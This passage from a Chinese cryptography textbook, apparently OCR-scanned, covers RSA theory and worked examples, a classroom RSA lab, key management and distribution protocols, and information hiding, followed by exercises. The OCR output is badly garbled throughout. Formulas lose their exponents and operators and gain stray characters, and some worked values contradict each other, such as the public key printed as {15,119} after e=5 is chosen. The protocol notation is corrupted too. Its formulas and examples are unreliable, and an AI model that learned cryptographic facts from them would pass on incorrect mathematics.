cryption standard, 高 级 加 密 标准 )。 经 过 几 年 的 反复 论证 和 评估 ,最 后 于 2000 年 10 月 2 日 
确定 选择 来 自 比 利 时 Katholieke Universiteit Leuven 电子 工程 系 的 Vincent Rijmen 博士 和 Pro- 
ton World International 的 Joan Daemen 博士 设计 的 加 密 算法 Rijndael( 两 人 的 姓氏 组 合 ) 。 

Rijndael 算法 设计 基于 非常 巧妙 的 数学 原理 ,经 过 AES 标准 化 后 ,规定 分 组 大 小 为 128 
比特 , 密 钥 长 度 可 以 是 128 比特 、192 比特 或 256 比特 ,分 别称 为 AES-128、AES-192、 
AES-256 。 


1.3 公开 密 钥 算法 RSA 
1.3.1 RSA 数学 基础 


1. 费 马 (Fermat) 定 理 


描述 1: 若 p 是 素数 ,a 是 正 整 数 且 不 能 被 p 整除 . 则 a?7! 志 1 mod p。 
描述 2: 对 于 素数 p, 若 a 是 任 一 正 整数 , 则 a? 寺 a(mod p)。 

例 1.1 设 p=3.4= 二 2, 则 2”! 二 4 三 1(mod 3) 或 2 二 8 三 2(mod 3)。 
例 1.2 设 p=5,4a 二 3, 则 3”! 二 81 三 1(mod 5) 或 3; 二 243 寺 3(mod 5)。 


过 


2. 欧 拉 (Euler) 函数 


欧 拉 函 数 p(n) 表 示 小 于 nn 并 与 n 互 素 的 正 整数 的 个 数 。 
例 1.3 gpg(6)=2 {1,5);9(7)=6{1,2,3,4,5,6};9(9)=6{1,2,4,5,7,8}。 


3. 欧 拉 定理 
欧 拉 定 理 : 若 整 数 a 和 wm 互 素 . 则 


a 二 1](mod m) 
例 1.4 设 4=3,m=7, 则 有 9g(7)=6,3 二 729,729 二 1(mod 7)。 
例 1.5 设 4a=4,m==5, 则 有 pg(5)==2,4? 二 16,16 夺 1(mod 5)。 


1.3.2 RSA 加 密 密 钥 的 产生 


RSA 依赖 于 一 个 基本 假设 : 分 解 因 子 问 题 是 计算 上 的 困难 问题 , 即 很 容易 将 两 个 素数 
乘 起 来 ,但 分 解 该 乘积 是 困难 的 。 


1. 基本 过 程 


@ 选 两 个 保密 的 大 素数 p 和 g (保密 ) 。 

@ 计算 n=pq( 公 开 ) ,p(n)= 二 (p 一 1)(g 一 1) (保密 )。 

@ 随机 选取 一 整数 e ,满足 1<e<p(z) 且 gcd(y(n),e) 二 1( 公 开 )。 

@ 计算 d ,满足 de 三 1(mod gp(n)) (保密 ) 。 

说 明 : d 是 e 在 模 gp(n) 下 的 乘法 逆 元 。 因 为 e 与 9g(n) 互 素 , 所 以 其 乘法 逆 元 一 定 存在 。 
@ 得 到 一 对 密 钥 : 公开 密 钥 : {e,n) ,秘密 密 钥 : {d,n)。 


2. 应 用 举例 


J@ 选择 两 个 素数 p= 二 7,g= 二 17。 

@ 计 算 n=pg=7X17=119。 
计算 的 欧 拉 函 数 g(n)= 二 (p 一 1)(g 一 1)= 二 6X16 二 96。 
@ 从 [0,95] 间 选 一 个 与 96 互 质 的 数 e 二 5。 

@ 根据 式 


5d=1 mod 96 
解 出 d=77, 因 为 ed=5X77==385= 二 4X96 十 1 三 1 mod 96。 
@ 得 到 公 钥 PK=(e,n)= 二 {15,119}, 密 钥 SK=={77,119})。 


1.3.3 RSA 加 密 /解密 过 程 


1. 基本 过 程 


(1) 明文 数字 化 ,即将 明文 转换 成 数字 串 。 
(2) 分 组 。 将 二 进 制 的 明文 串 分 成 长 度 小 于 logzn 的 数字 分 组 。 如 果 p 和 g 都 为 100 
位 素数 , 则 将 有 200 位 ,所 以 每 个 明文 分 组 应 小 于 200 位 。 


(3) 加 密 算法 

Ci 一 MiCmod7z) 
最 后 得 到 的 密 文 C 由 长 度 相同 的 分 组 C; 组 成 。 
(4) 解密 算法 


D(C) = CC (mod n) 
2. 综合 应 用 举例 


(1) 产生 密 钥 


设 p=43,g 二 59,n 二 43X59 二 2537,g(n) 二 42X58 二 2436, 取 e= 二 13( 与 pg(n) 没 有 公 因 
子 ), 解 方程 


de 二 (mod 2436) 

2436 = 二 13X187 十 5， 5 二 2436 一 13 X187 

13 一 2X5 十 3，3 王 13 一 2X5 

1 一 3 一 2=3 一 (5 一 3) = 三 2X3=5=2X(13=2X5)=85 
=2X13=5X5 

2X13—5X(2436—= 13 X187) 

《L187 542)X 13—5X.2436 

= 937 X 13—5 X2436 


即 
937 X13 三 1(mod 2436) 
故 e=13, d= 二 937。 
(2) 加 密 
明文 : public key encryptions 
明文 分 组 : pu bl ic ke ye nc ry pt io ns 
明文 数字 化 ( 按 字母 序 , 令 a=00,b 王 01,c 王 02,…,y 一 24,z 一 25) : 
1520 0111 0802 1004 2404 1302 1724 1519 0814 1418 
加 密 : 按照 算法 M;(Cmod n) 二 C;, 如 1520*(mod 2537) 二 0095 得 到 密 文 
0095 1648 1410 1299 1365 1379 2333 2132 1751 1289 
解密 : 按照 算法 Ci (mod m) 一 Mi; ,如 0095”3? (mod 2537) 一 1520。 


1.3.4 RSA 安全 性 分 析 


RSA 体制 的 加 密 强 度 依 赖 于 大 数 分 解 的 困难 程度 。 采 用 穷 举 法 ,对 于 两 个 100 位 的 十 
进 制 大 素数 ,破译 它 大 约 需 要 103 步 , 若 使 用 100 万 步 / 秒 的 计算 机 资源 对 其 进行 破 密 , 约 需 
要 1000 年 。 

但 是 ,人 类 的 计算 能 力 在 不 断 提 高 ,原来 一 些 被 认为 不 可 能 分 解 的 大 数 , 现 在 已 经 被 成 
功 分 解 。 例 如 ,RSA-129( 即 为 129 位 的 十 进 制 数 , 约 428 比特 ) ,历时 8 个 月 ,于 1994 年 4 
月 被 成 功 分 解 。 而 且 有 报道 ,科学 家 正在 用 量子 方法 对 大 数 分 解 发 起 冲击 。 

不 过 ,在 目前 的 情况 下 , 密 钥 长 度 在 1024 一 2048 比特 的 RSA 还 是 相对 安全 的 。 

为 了 保证 RSA 安全 性 ,对 p 和 g 还 有 如 下 要 求 : 
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(1) p 和 g 的 长 度 相差 不 要 太 大 ; 
(2) p 一 1 和 g 一 1 都 应 当 有 大 数 因子 ; 
(3) gcd(p 一 1,g 一 1) 应 小 。 


实验 2 RSA 公开 密 钥 系统 的 实现 


1. 实验 目的 


(1) 掌握 产生 RSA 密 钥 对 的 程序 设计 方法 。 
(2) 掌握 产生 RSA 加 密 /解密 程序 设计 方法 。 


2. 实验 内 容 


(1) 实验 由 3 组 (人 ) 共 同 完成 : 第 一 组 和 第 二 组 之 间 进 行文 件 通信 ;第 三 组 负责 为 第 一 
组 和 第 二 组 各 生成 一 对 密 钥 , 并 把 第 一 组 的 私 钥 传 送 给 第 一 组 ,把 第 二 组 的 私 钥 传 送 给 第 二 
组 ,把 两 组 的 公 钥 公开 。 

(2) 进行 一 轮 实 验 后 ,轮转 角色 ,使 每 一 组 分 别 担当 一 次 密 钥 生 成 角色 、 报 文 发 送 角色 
和 报 文 接收 角色 。 担 当 每 一 种 角色 时 运行 自己 设计 的 该 角色 的 程序 。 

(3) 担当 密 钥 生成 角色 要 自己 先 对 生成 的 密 钥 进行 共 模 攻 击 和 低 指 数 攻击 测试 。 担 当 
其 他 角色 时 ,还 要 对 第 三 方 生成 的 密 钥 进行 攻击 测试 。 


3. 实验 准备 


(1) 进行 RSA 加 密 / 解 密 程序 设计 。 

。 编写 函数 求 出 1 一 65535 之 间 的 全 部 素数 。 
。 编写 函数 将 输入 的 字符 串 转 为 数字 串 。 

。 编写 函数 将 输入 的 数字 串 转 为 字符 串 。 

。 编写 RSA 加 密 程序 。 

。 编写 RSA 解密 程序 。 

(2) 编写 生成 一 对 RSA 密 钥 的 程序 。 

(3) 设计 对 自己 生成 的 密 钥 进行 测试 的 方法 。 
(4) 设计 对 别人 生成 的 密 钥 进 行 测试 的 方法 。 
(5) 对 RSA 源 程序 进行 编译 和 调试 。 

(6) 准备 实验 用 的 被 加 密 文件 。 


4. 推荐 的 分 析 讨 论 内 容 


(1) 你 知道 哪些 公 钥 密码 体制 ? 试 进行 简单 比较 。 
(2) 分 析 影响 RSA 密码 体制 强度 的 因素 。 
(3) 其 他 发 现 或 想到 的 问题 。 


| 


1.4 密 钥 管理 


现代 密码 体制 有 点 像 门 锁 , 房 间 的 安全 主要 依赖 于 钥匙 。 也 更 像 现 代 的 电子 锁 , 锁 门 的 
操作 (相当 于 加 密 算法 ) 非 常 简单 ,房间 的 安全 关键 在 于 卡片 式 钥匙 的 保管 ,而 一 旦 卡片 丢失 
或 房间 换 人 ,只 要 重新 对 卡片 进行 设置 即 可 。 按 照 " 一 切 秘密 寓于 密 钥 之 中 ”的 现代 密码 学 
基本 原则 , 密 钥 的 安全 保护 成 为 系统 安全 的 一 个 重要 方面 ,以 及 密 钥 管理 系统 安全 中 的 一 件 
至 关 重 要 的 工作 。 


1.4.1 密 钥 管理 的 一 般 过 程 


一 般 来 说 , 密 钥 管理 主要 包括 密 钥 的 生成 分配、 使 用 ,更 新 、 撤 销 、 销 毁 等 一 系列 过 程 。 
下 面 简 要 介绍 这 些 过 程 。 


1. 密 钥 的 生成 


密 钥 生成 的 目的 是 生成 好 的 密 钥 。 对 于 对 称 加 密 来 说 , 密 钥 的 长 度 越 大 ,对 应 的 密 钥 空 
间 就 越 大 , 密 钥 的 强度 就 大 。 此 外 ,由 自动 密 钥 设备 生成 的 随机 比特 串 要 比 按照 某 种 规则 生 
成 的 密 钥 好 。 但 是 ,在 选择 随机 生成 的 密 钥 时 ,要 避免 选择 弱 密 钥 。 对 于 公 钥 密码 体制 来 
说 , 密 钥 还 必须 满足 特定 的 数学 特征 。 


2. 密 钥 的 分 配 


在 密 钥 管理 中 ,最 核心 .最 关键 的 问题 是 密 钥 分 配 。 密 钥 主 要 涉及 密 钥 的 发 送 和 验证 。 
前 者 要 求 通过 非常 安全 的 通路 进行 传送 ,后 者 要 求 有 一 套 机 制 用 于 检验 分 发 和 传送 的 正 
确 性 。 

密 钥 的 分 发 方法 可 以 分 为 两 种 : 网 外 分 发 和 网 内 分 发 。 网 外 分 发 即 人 工分 发 : 派 非 常 
可 靠 的 信使 (邮寄 信和 铝 等 ) 携 带 密 钥 分 配给 各 用 户 。 但 是 , 随 着 用 户 的 增加 、 通 信和 量 的 增 大 
以 及 黑客 技术 的 发 展 , 密 钥 的 使 用 量 增 大 , 且 要 求 频繁 更 换 , 信 使 分 配 就 不 再 适用 ,而 多 采用 
网 内 密 钥 分 配 , 即 自动 密 钥 分 配 。 

网 内 密 钥 分 配 的 方式 有 两 种 : 用 户 之 间 直 接 分 配 和 通过 设立 一 个 密 钥 分 配 中 心 (key 
distribution center, KDC) 分 配 。 具 体 过 程 由 密 钥 分 配 协议 决定 。 目 前 国际 有 关 标 准 化 机 构 
都 在 着 手 制定 关于 密 钥 管 理 技术 的 规范 。 


3. 密 钥 的 控制 使 用 


控制 密 钥 使 用 ,是 为 了 保证 按照 预定 的 方式 使 用 。 控 制 密 钥 使 用 的 信息 有 : 
。 密 钥 主权 人 ; 
。 密 钥 合法 使 用 期 限 ; 
。 密 钥 标识 符 ; 
。 密 钥 预定 用 途 ; 
。 密 钥 预 定 算法 ; 
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。 密 钥 预 定 使 用 系统 ; 
。 密 钥 授权 用 户 ; 
。 在 密 钥 生成 注册、 证 书 等 有 关 实 体 中 的 名 字 等 。 


4. 密 钥 的 保护 与 存储 


密 钥 从 产生 到 终结 ,在 整个 的 生存 期 中 都 需要 保护 。 一 些 基本 的 措施 有 : 

。 密 钥 决 不 能 以 明文 形式 存放 。 

。 密 钥 首先 选择 物理 上 最 安全 的 地 方 存放 。 

。 在 有 些 系 统 中 可 以 使 用 密 钥 碾 碎 技术 由 一 个 短语 生成 单 钥 密 钥 。 

。 可 以 将 密 钥 分 开 存放 。 例 如 ,将 密 钥 平 分 成 两 段 , 一 段 存 和 终端 ,一 段 存 人 ROM, 或 
者 将 密 钥 分 成 若干 片 , 分 发 给 不 同 的 可 信者 保管 。 


S. 密 钥 的 停 用 和 更 新 


任何 密 钥 都 不 可 能 无 限期 地 使 用 。 有 许多 因素 ,使 得 密 钥 不 能 使 用 太 长 的 时 间 ,如 密 钥 
使 用 越久 ,攻击 者 对 它 的 攻击 方法 越 多 ,攻击 的 机 会 也 就 越 多 。 密 钥 一 旦 泄露 , 若 不 立即 废 
除 , 时 间 越 长 ,损失 越 大 。 因 此 ,不 同 的 密 钥 应 当 有 不 同 的 有 效 期 ,同时 必须 制定 一 个 检测 密 
钥 有 限期 的 策略 。 密 钥 的 有 限期 依据 数据 的 价值 和 给 定时 间 内 加 密 数 据 的 数量 确定 。 

当 发 生 下 列 情 况 时 ,应 当 停止 密 钥 的 使 用 ,更 新 密 钥 。 

。 密 钥 的 使 用 期 到 ,应 该 更 新 密 钥 。 

。 确信 或 怀疑 密 钥 被 泄露 , 密 钥 及 其 所 有 变形 都 要 替换 。 

。 人 怀疑 密 钥 是 由 一 个 密 钥 加 密 密 钥 或 其 他 密 钥 推导 出 来 时 ,各 层 与 之 相关 的 密 钥 都 应 

更 换 。 
。 通过 对 加 密 数 据 的 攻击 可 以 确定 密 钥 时 ,在 这 段 时 间 内 必须 更 换 密 钥 。 
。 确信 或 怀疑 密 钥 被 非法 蔡 换 时 ,该 密 钥 和 相关 密 钥 都 要 被 更 换 。 


6. 密 钥 的 销毁 


密 钥 被 替换 后 , 旧 密 钥 必 须 销 毁 。 旧 密 钥 虽 然 不 再 使 用 , 却 可 以 给 攻击 者 提供 许多 有 重 
大 参考 价值 的 信息 ,为 攻击 者 推测 新 的 密 钥 提供 许多 有 价值 的 信息 。 为 此 ,必须 保证 被 销毁 
的 密 钥 不 能 给 任何 人 提供 丝毫 有 价值 的 信息 。 下 面 是 在 销毁 密 钥 时 使 用 过 的 一 些 方法 , 供 
参考 : 

。 密 钥 写 在 纸 上 时 ,要 把 纸张 切 碎 或 烧毁 。 

。 密 钥 存在 EEPROM 中 时 ,要 对 EEPROM 进行 多 次 重 写 。 

。 密 钥 存在 EPROM 或 PROM 时 ,应 将 EPROM 或 PROM 打 碎 成 小 片 。 

。 密 钥 存在 磁盘 时 ,应 当 多 次 重 写 覆 盖 密 钥 的 存储 位 置 ,或 将 磁盘 切 碎 。 

。 要 特别 注意 对 存放 在 多 个 地 方 的 密 钥 的 同时 销毁 。 


1.4.2 密 钥 分 配方 法 举例 


密 钥 分 配 是 密 钥 管理 的 核心 。 下 面 介绍 几 种 密 钥 的 分 配方 法 。 
和 过 总 


1. 密 钥 分 配 中 心 分 发 单 密 钥 


若 A 和 B 有 一 个 共同 的 可 信任 的 第 三 方 一 一 密 钥 分 配 中 心 KDC。KDC 可 以 通过 加 密 
连接 将 密 钥 安全 地 传送 给 A 和 B。 这 种 方法 多 用 于 单 钥 密 钥 的 分 配 。 图 1. 9 为 一 个 采用 这 
种 方法 的 密 钥 分 配 例子 。 


G) 
GO 


图 1.9 一 个 依靠 KDC 进行 密 钥 分 配 的 例子 


这 个 例子 的 前 提 是 A 和 B 有 一 个 共同 的 可 信任 的 第 三 方 一 一 KDC, 即 KDC 分 别 与 A 
和 B 有 一 保密 的 信道 , 即 KDC 与 A 和 B 分 别 已 经 有 一 通信 和 密 钥 KA 和 Ks。 假定 A 与 B 的 
通信 和 是 A 主动 ,目的 是 通过 KDC 分 配 的 密 钥 与 B 建立 一 个 秘密 通信 和 通道。 过程 如 下 。 

QA 向 KDC 发 出 会 话 密 钥 请 求 : ID | IDs | mi 。 

。 IDA ID 标识 会 话 双 方 A 和 B。 

。 六 标识 本 次 会 话 (可 能 是 时 间 戳 或 随机 数 等 一 个 他 人 难于 猜测 的 现时 值 ) 。 

@ KDC 对 A 的 请 求 应 答 : Ek, [Ks | IDs 上 Ni 上 Ex L{Ks | IDA)]。 

全 部 报 文 用 A 已 经 掌握 的 密 钥 KA 加 密 , 内 容 包 括 3 部 分 : 

。 一 次 性 会 话 密 钥 Ks。 

。AA 的 请 求 报 文 ( 供 A 检验 )。 

。 要求 A 中转, 但 A 不 能 知道 内 容 、 用 Ks 加 密 的 一 段 报 文 : Ks | IDA。 

@ A 存储 Ks, 并 向 B 转 发 : Ek, [Ks | IDA]。B 得 到 : 

。 Ks ,还 知道 Ks 来 自 KDC( 因 为 用 Ks 可 解密 ,而 A 不 知道 Ka, 只 有 KDC 知道 Ks)。 

。 由 ID。 知 道 会 话 方 是 A。 

@ B 向 A 回 送 报 文 : Ex [N;]。 

。 用 Ks 表明 自己 的 身份 是 B( 因 为 Ks 要 用 Ks 解密 )。 

。 用 N: 再 确认 。 

@ A 向 B 回 送 报 文 : EksLFCN:)]。 确 认 也 前 次 收 到 的 报 文 不 是 回放 。 

这 样 ,A 与 B 就 有 了 自己 的 秘密 通道 了 。 


2. 无 中 心 的 单 钥 分 配 


图 1. 10 是 在 无 KDC 或 不 依靠 KDC 时 ,A、B 两 方 建立 会 话 密 钥 的 过 程 。 
QA 向 B 会 话 请 求 : Ni 。Ni 标 识 本 次 会 话 ( 可 能 是 时 间 戳 或 随机 数 等 一 个 他 人 难于 
猜测 的 现时 值 ) 。 
@ B 对 A 的 请 求 应 答 : Ev [Ks | IDa 上 fCN1) | N?]。 
全 部 报 文 用 A、B 共享 的 主 密 钥 Mk 加 密 , 内 容 包 括 4 部 分 : 
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图 1.10 一 个 无 中 心 的 单 密 钥 分 配 例子 


。B 选取 的 会 话 密 钥 Ks; 

。 A 的 请 求 报 文 (包括 /(N1), 供 A 检验 ); 

。B 的 身份 IDs; 

。 标 识 本 次 会 话 的 N,。 

@ A 存储 Ks, 并 向 BB 返回 用 Ks 加 密 f(N;), 供 BB 检验 。 

采用 这 种 密 钥 分 配方 法 ,在 每 一 对 通信 主体 之 间 都 需要 一 个 共享 主 密 钥 。 对 于 一 个 有 
nn 个 通信 主体 的 网 络 , 主 密 钥 的 数量 达到 n(n 一 1)/2 个 。 当 网 络 较 大 时 ,这 种 方法 没有 什么 
实用 价值 。 而 依靠 KDC 进行 密 钥 分 发 仅 需 要 个 (KDC 与 每 个 通信 实体 之 间 共 享 的 ) 主 
密 钥 。 


3. 由 公 钥 管理 机 构 分 发 公 钥 


若 存 在 一 个 公 钥 管 理 机 构 , 并 且 所 有 用 户 都 知道 该 公 钥 管理 机 构 的 公 钥 ,而 只 有 该 公 钥 
管理 机 构 知道 自己 的 私 钥 , 才 可 以 采用 图 1. 11 所 示 的 方法 进行 A、B 公开 密 钥 体制 的 密 钥 
分 配 。 


图 1.11 一 个 依靠 公 钥 管 理 机 构 进行 密 钥 分 配 的 例子 


Q@ 用 户 A 向 公 钥 管理 机 构 发 出 请 求 报 文 : 
。 一 个 带 时 间 戳 的 报 文 。 
。 获取 也 的 公 钥 的 请 求 。 
@ 公 钥 管理 机 构 对 A 应 答 ( 用 A 的 公 钥 加 密 ,A 用 自己 的 私 钥 解密 ) 。 内 容 有 : 
。 也 的 公 钥 PKs( 供 和 向 也 发 加 密 报 文 ) 。 
。 A 的 请 求 ( 供 A 验证 本 报 文 是 对 自己 请 求 的 应 答 ) 。 
。 最 初 的 时 间 戳 ( 供 A 确认 不 是 公 钥 管理 机 构 发 来 的 旧 报 文 ,以 便 确 定 PKs 确 是 B 
的 )。 
@@.@ B 用 同 、@ 相 同 的 方法 ,从 公 钥 管理 机 构 得 到 A 的 公 钥 PKA 。 
@ A 用 PKs 向 BB 发 送 一 个 报 文 : 
。 A 的 身份 IDa。 
。45。 


。 一 次 性 随机 数 Ni 。 

@B 用 PKA 向 A 发 送 一 个 报 文 : 

。 Ni( 由 于 只 有 B 才 能 解密 用 PKs 加 密 的 报 文 ,将 Ni 返回 A, 让 A 确认 是 B)。 

。 一 次 性 随机 数 N; 。 

Q@ A 用 PKs 将 N; 加 密 , 返 回 B, 供 B 确 认 。 

这 种 方法 是 基于 公 钥 目录 表 的 。 公 钥 目 录 表 是 由 某 个 可 信 的 公 钥 管理 机 构 管理 ,并 定 
期 更 新 .定期 公布 的 用 户 公 钥 目 录 表 。 目 录 表 中 的 每 个 目录 项 由 两 个 数据 组 成 : 用 户 名 和 
该 用 户 的 公 钥 。 

用 户 可 以 在 公 钥 目录 表 的 管理 机 构 注 册 自 己 的 公 钥 ,也 可 以 随时 更 换 现 有 的 公 钥 ,也 可 
以 通过 电子 方式 在 有 安全 认证 的 情况 下 访问 公 钥 目录 表 。 

应 当 注意 的 是 , 公 钥 目录 表 可 能 会 被 攻击 者 伪造 ,监听 和 攻击 。 


4. 公 钥 证 书 


公 钥 证 书 是 由 CA(certificate authority ,证 书 授权 中 心 或 认证 中 心 ) 为 用 户 发 布 的 一 种 

电子 证 书 。 例 如 用 户 A 的 证 书 内 容 形式 为 
CA 一 Esc [T,IDA,PKA] 

其 中 : 

。 IDA 是 用 户 A 的 标识 。 

。 PKA^ 是 A 的 公 钥 。 

。 工 是 当前 时 间 戳 ,用 于 表明 证 书 的 新 鲜 性 ,防止 发 送 方 或 攻击 者 重 放 一 旧 证 书 。 

。 SKcea 是 CA 的 私 钥 。 证 书 是 用 CA 的 私 钥 加 密 的 ,以 便 让 任何 用 户 都 可 以 解密 ,并 

确认 证 书 的 颁发 者 。 

当 一 方 要 与 另 一 方 建立 保密 信道 时 ,就 要 把 自己 的 证 书 发 给 对 方 。 接 收 方 用 CA 的 公 
钥 对 证 书 进行 查验 ,可 以 获得 发 送 方 的 公 钥 。 接 收 方 同意 进行 保密 通信 ,也 要 将 自己 的 证 书 
发 送 到 对 方 。 这 样 , 就 不 依赖 CA 而 直接 交换 了 公 


1.5 信息 隐藏 概述 


1.5.1 信息 隐藏 的 概念 


信息 隐藏 (information hiding) 是 指 隐藏 数据 的 存在 性 ,通常 是 把 一 个 秘密 信息 (secret 
message) 隐 藏 在 另 一 个 可 以 公开 的 信息 载体 (cover) 中 ,形成 新 的 隐秘 载体 (stego cover)， 
目的 是 不 让 非法 者 知道 隐秘 载体 中 是 否 隐藏 了 秘密 信息 ,并 且 即 使 知道 也 难于 从 中 提取 或 
去 除 秘密 信息 。 

信息 隐藏 与 数据 加 密 都 是 用 来 保护 信息 机 密 性 的 手段 ,并 且 信 息 隐 藏 技术 也 承袭 了 数 
据 加 密 的 一 些 基本 思想 和 概念 ,例如 信息 隐藏 的 过 程 也 可 以 利用 密 钥 进行 控制 。 但 是 ,信息 
隐藏 与 数据 加 密 所 采用 的 技术 手段 不 同 。 数 据 加 密 的 基本 方法 是 编码 ,通过 编码 将 明文 变 
换 为 密 文 。 而 信息 隐藏 是 “隐藏 ”, 使 非法 者 难以 找到 秘密 信息 。 一 般 多 用 多 媒体 数据 作为 
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载体 。 这 是 因为 多 媒体 数据 本 身 具 有 极 大 的 元 余 性 ,具有 较 大 的 掩蔽 效应 。 
1.5.2 信息 隐藏 处 理 过 程 
图 1.12 表明 了 信息 的 隐藏 过 程 和 提取 过 程 。 


密 钥 载体 C] ”一 ~| 提取 算法 | 作 ~[ 解 也 处 理 | 分 
I 
刀 -| 预 处 理 |- 作 一 | 嵌入 算法 | ~ ”| 密 请 Ky 上 俄 体 C 
(a) 信息 隐藏 过 各 (b) 信息 提取 过 程 


图 1.12 信息 的 隐藏 过 程 和 提取 过 程 


信息 隐藏 过 程 是 : 
。 对 原始 报 文 M 进行 预 处 理 ( 如 加 密 、 压 缩 等 ) 形 成 隐藏 报 文 M ， 
。 在 密 钥 K, 的 控制 下 ,通过 嵌入 算法 (embedding algorithm) 将 可 隐藏 报 文 M 隐藏 于 
公开 信息 载体 C 中 ,形成 隐秘 载体 S。 
信息 提取 过 程 是 : 
。 在 密 钥 K; 的 控制 下 ,使 用 提取 算法 从 隐秘 载体 S 中 提取 出 可 隐藏 报 文 M'; 
。 由 隐藏 报 文 M' 进 行 解密 、 解 压 等 逆 预 处 理 , 恢 复出 原来 的 报 文 M。 
1.5.3 信息 隐藏 技术 分 类 
对 信息 隐藏 技术 可 以 进行 如 下 分 类 : 
1. 按照 载体 类 型 分 类 
。 文 本 载体 信息 隐藏 ; 
。 图像 载体 信息 隐藏 ; 
。 声音 载体 信息 隐藏; 


。 视频 载体 信息 隐藏 ; 
"二 进 制 流 载 体 隐藏 等 。 


2. 按照 控制 密 钥 分 类 


。 对称 隐藏 算法 ; 
。 公 和 钥 隐 藏 算法 。 


3. 按照 隐藏 空间 分 类 


(1) 信道 隐藏 : 利用 信道 固有 的 特性 进行 信息 隐藏 。 目 前 主要 有 两 类 : 基于 网 络 模型 
的 信息 隐藏 和 基于 扩 频 的 信息 隐藏 。 
(2) 空域 /时 域 信息 隐藏 : 利用 待 隐藏 信息 位 替换 载体 中 的 一 些 最 不 重要 位 。 例 如 把 表 
示 一 个 像素 点 灰 度 的 数值 中 的 180 的 0 进行 蔡 换 ,结果 为 180 或 181 ,都 不 会 产生 太 大 影响 。 
二 


(3) 变换 域 信息 隐藏 : 把 待 隐 藏 信息 嵌入 到 载体 的 变换 空间 (如 频 域 ) 中 。 这 种 方法 具 
有 分 布 性 、 可 变换 性 和 较 高 的 鲁 棒 性 。 
(4) 其 他 发 现 或 想到 的 问题 。 


Lm 


习 题 


有 明文 can you understand， 


(1) 假定 有 一 个 密 钥 ,其 顺序 为 2,4,3,1 的 列 换 位 密码 ,其 换 位 密 文 是 什么 ? 
(2) 设 密 钥 是 i ==1,2,3,4 的 一 个 置换 f(i) 二 1,3,4,2, 则 周期 为 4 的 换 位 密 文 是 什么 ? 


‘0 Dw mv 


. 比较 两 种 密 钥 体制 的 优 缺 点 。 

. 简 述 RSA 算法 的 原理 。 

. 设 通信 双方 使 用 及 对 明文 computer ,使 用 密 钥 program 按照 DES 算法 进行 加 密 。 

. 解释 用 DES 的 解密 算法 。 

. 编写 程序 ,用 于 实现 DES 加 密 算法 。 

. 讨论 DES 的 不 足 与 解决 办 法 。 

. 在 非 对 称 密码 体制 中 ,第 三 方 如 何 断定 通信 者 有 无 抵赖 或 伪造 行为 ? 

. 设 通信 双方 使 用 RSA 加 密 体制 ,接收 方 的 公开 密 钥 是 (e,z) = 一 (5,35), 求 明文 M 一 

30 对 应 
10. 


的 密 文 。 
在 使 用 RSA 公 钥 的 通信 中 , 若 截取 了 发 送 给 其 他 用 户 的 密 文 C=10, 并 且 用 户 的 


公 钥 为 (e,n) 二 (5,35), 求 对 应 的 明文 。 


uy; 
12. 
13. 
14. 
15. 
16, 
了 
18: 
9 
20. 
21, 
22. 
23. 


设计 程序 实现 RSA 算法 ,并 验证 其 正确 性 。 

简 述 通信 双方 如 何 使 用 密 钥 体 制 建立 通信 中 的 信任 关系 。 

有 哪些 建立 公开 密 钥 体 制 的 方法 ? 

区 别 单 钥 密 钥 体 制 和 公开 密 钥 体制 中 的 密 钥 分 配 办 法 。 

如 何 利用 公开 密 钥 加 密 进行 单 钥 加 密 密 钥 的 分 配 ? 

请 自己 设计 一 个 密 钥 生成 算法 ,并 验证 其 密 钥 空间 的 安全 性 。 
在 密 钥 的 生存 期 间 内 ,如 何 对 密 钥 进 行 有 效 的 管理 ? 

销毁 被 撤销 的 密 钥 时 ,应 注意 些 什么 ? 

简 述 信息 隐藏 的 基本 嵌入 和 检测 过 程 。 

简 述 数字 水 印 的 定义 和 内 容 。 

简 述 数字 隐藏 技术 中 隐 含 的 信任 关系 。 

收集 国内 外 有 关 加 密 或 信息 隐藏 技术 的 网 站 信息 ,简要 说 明 各 网 站 的 特点 。 
收集 国内 外 有 关 加 密 或 信息 隐藏 技术 的 最 新 动态 。 
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在 激烈 的 竞争 社会 中 ,敏感 数据 是 稀缺 的 资源 ,因此 数据 安全 保护 是 信息 系统 安全 的 核 
心 。 通 常 ,数据 安全 保护 涉及 如 下 几 个 方面 ; 

(1) 机 密 性 保护 , 即 防止 敏感 数据 被 泄露 ,包括 防止 信息 被 不 该 知晓 的 人 知晓 ,以 及 防 
止 通过 发 现 通信 方式 分 析 关 于 通信 特征 及 收集 或 获取 通信 内 容 。 

(2) 完整 性 保护 , 即 防止 对 数据 的 算 改 。 这 里 的 算 改 包括 3 个 方面 : 

。 内 容 自 改 : 截获 数据 ,进行 插入 、 删 除 、 修 改 操作 ; 

。 序列 算 改 : 在 传输 的 报 文 分 组 序列 中 ,进行 分 组 的 插入 、 删 除 或 重新 排列 ; 

。 时 间 算 改 : 对 传输 的 报 文 进行 延 时 或 回放 操作 。 

(3) 抗 抵赖 (或 否认 ) 保 护 , 即 防止 接收 方 否认 收 到 报 文 或 发 送 方 否认 发 送 过 报 文 。 

(4) 真实 性 保护 , 即 防止 伪装 或 假冒 别人 身份 发 送 数 据 。 

在 第 1 章 中 介绍 了 数据 机 密 性 保护 的 基本 技术 ,本 章 介 绍 关于 数据 完整 性 保护 、 抗 抵赖 
保护 和 真实 性 保护 的 基本 技术 , 即 认证 。 

认证 也 是 建立 在 现代 密码 学 上 的 。 从 认证 的 对 象 看 ,可 以 分 为 报 文 认证 和 身份 认证 。 
报 文 认 证 主要 包括 报 文 鉴别 (主要 用 于 完整 性 保护 ) 和 数字 签名 (主要 用 于 抗 抵赖 保护 ) , 身 
份 认证 用 于 真实 性 保护 。 


2.1 报 文 鉴 别 


2.1.1 数据 完整 性 保护 概述 

如 前 所 述 ,数据 的 完整 性 包括 3 个 方面 : 内 容 完整 性 .序列 完整 性 和 时 间 完 整 性 。 保 护 
序列 完整 性 的 一 般 办 法 是 给 发 送 的 报 文 加 一 个 序列 号 ,接收 方 通过 检查 序列 号 来 鉴别 报 文 
传送 的 序列 有 没有 被 破坏 。 

时 间 完 整 性 保护 也 称 数据 的 实时 性 保护 ,通常 可 以 采用 两 种 方法 : 

1. 时 间 戳 


为 发 送 的 报 文 附加 一 个 时 间 戳 。 接 收 方 可 以 通过 检查 时 间 戳 ,判断 报 文 的 延 时 并 发 现 
重 放 的 报 文 。 在 实时 性 要 求 较 高 的 情况 下 ,可 以 将 收 到 的 报 文 的 时 间 蕉 中 的 时 间 与 当前 时 
间 比 较 , 看 是 否 接近 当前 时 间 。 

